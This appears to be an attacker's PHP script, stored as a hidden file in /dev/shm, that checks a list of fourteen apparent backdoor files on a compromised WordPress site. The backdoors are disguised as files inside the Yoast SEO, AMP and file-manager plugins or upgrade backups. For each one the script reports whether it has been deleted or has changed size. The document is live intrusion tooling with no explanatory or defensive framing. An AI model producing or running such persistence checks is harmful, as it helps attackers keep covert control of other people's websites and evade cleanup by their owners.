File: //dev/shm/.factor
<?php $r = '/home/kyzlmlaegp/tulip-128.net'; $x = ["/wp-content/plugins/wp-file-manager/lib/php/plugins/Sanitizer/multi.php"=>"bd@@39183@@968",
"/wp-content/plugins/wordpress-seo/src/schema-aggregator/infrastructure/indexable-repository/indexable.query.repository.php"=>"bd@@39000@@935",
"/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/object.php"=>"bd@@16488@@979",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Validator/Spec/Error/Util.php"=>"bd@@15984@@985",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Validator/Spec/CssRuleset/change_pass2.php"=>"bd@@46454@@926",
"/wp-content/plugins/wordpress-seo/src/dashboard/application/score-groups/seo-score-groups/seo.score.groups.repository.php"=>"bd@@46717@@824",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Optimizer/Configuration/anycontent.php"=>"bd@@16267@@813",
"/wp-content/plugins/wordpress-seo/src/dashboard/domain/score-groups/seo-score-groups/seo.score.score.group.php"=>"bd@@16781@@949",
"/wp-content/upgrade-temp-backup/center.php"=>"bd@@6289@@999",
"/wp-content/plugins/amp/vendor/sabberworm/php-css-parser/src/Rule/toexport.inc.php"=>"bd@@17080@@944",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Validator/Spec/DescendantTagList/edit.php"=>"bd@@46524@@846",
"/wp-content/plugins/wordpress-seo/src/llms-txt/domain/available-posts/data-provider/parameters.posts.php"=>"bd@@46784@@906",
"/wp-content/plugins/amp/vendor/willwashburn/stream/src/Stream/Exception/nuSOAP.module.php"=>"bd@@46580@@927",
"/wp-content/upgrade-temp-backup/custom.functions.1782737466.php"=>"bd@@5623@@1073"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');